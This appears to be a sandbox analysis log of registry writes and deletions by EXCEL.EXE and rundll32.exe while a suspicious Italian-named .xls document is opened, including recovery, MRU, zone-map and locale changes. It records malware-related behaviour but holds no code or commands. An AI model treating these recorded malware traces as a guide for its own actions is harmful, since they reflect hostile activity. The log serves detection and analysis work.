04000000880400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C00010000000000000050898EEE57F3D40136760E0036760E0000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\E7915
E7915
04000000880400004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000E08059EC57F3D40115790E0015790E0000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D4F357EF0A7010][O00000000]*C:\Users\admin\Desktop\
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D4F357EF0F2B00][O00000000]*C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
1160
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994641
1160
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994642
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
67
1160
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
67
3564
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3564
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3564
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0
3564
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3564
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EB042
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
=g/
3D672F00EC0D0000010000000000000000000000
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
EC0D0000F27D9AF657F3D40100000000
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0
EADE0
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0E90CF757F3D401E0AD0E00E0AD0E0000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0
EADE0
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0E90CF757F3D401E0AD0E00E0AD0E0000000000AC020000001800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1317994521
3564
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994643
3564
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1317994501
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EADE0
EADE0
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000000000000F0E90CF757F3D401E0AD0E00E0AD0E0000000000AC020000001800000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\EB042
EB042
04000000EC0D00004000000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0044006F00630075006D0065006E0074006F005F003000350039003000320035005F00460054005F00320030003100390030003400310035005F0030003000300035003000300038005F002E0078006C007300000000001700000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C000100000001000000E08059EC57F3D40142B00E0042B00E0000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D4F357F76C4800][O00000000]*C:\Users\admin\Desktop\
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D4F357F76E91F0][O00000000]*C:\Users\admin\Desktop\Documento_059025_FT_20190415_0005008_.xls
3564
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994644
3564
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1317994645
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
69
3564
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
69
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
2720
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
LocaleName
it-IT
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCalendarType
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s1159
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s2359
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTimeFormat
HH:mm:ss
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTime
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTLZero
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTimePrefix
0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTime
:
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortDate
dd/MM/yyyy
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDate
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDate
/
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLongDate
dddd d MMMM yyyy
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sYearMonth
MMMM yyyy
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCurrency
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrency
2
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegCurr
9
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrDigits
2
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDecimal
,
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonDecimalSep
,
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sThousand
.
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonThousandSep
.
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sList
;
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDigits
2
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iLZero
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegNumber
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNativeDigits
0123456789
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
NumShape
1
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iMeasure
0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstDayOfWeek
0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstWeekOfYear
2
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sGrouping
3;0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonGrouping
3;0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sPositiveSign
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNegativeSign
-
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iPaperSize
9
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortTime
HH:mm
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLanguage
ITA
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCountry
Italy
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCountry
39
2720
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2720
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000409
2720
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
2720
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
2720
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International\Geo
Nation
118
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
636
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5084
Arabic (101)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5053
Bulgarian (Typewriter)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5065
Chinese (Traditional) - US Keyboard
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5031
Czech
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5007
Danish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5011
German
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5046
Greek
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5000
US
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5020
Spanish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5009
Finnish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5010
French
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5083
Hebrew
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5033
Hungarian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5013
Icelandic
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5015
Italian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5061
Japanese
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5063
Korean
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5008
Dutch
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5018
Norwegian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5035
Polish (Programmers)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5003
Portuguese (Brazilian ABNT)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5037
Romanian (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5055
Russian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5030
Croatian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5039
Slovak
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5029
Albanian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5022
Swedish
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5079
Thai Kedmanee
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5060
Turkish Q
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5129
Urdu
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5058
Ukrainian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5052
Belarusian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5041
Slovenian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5042
Estonian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5043
Latvian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5045
Lithuanian IBM
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5151
Tajik
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5124
Persian
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5118
Vietnamese
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5120
Armenian Eastern
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5117
Azeri Latin
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5163
Sorbian Standard (Legacy)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5109
Macedonian (FYROM)
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5191
Setswana
636
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
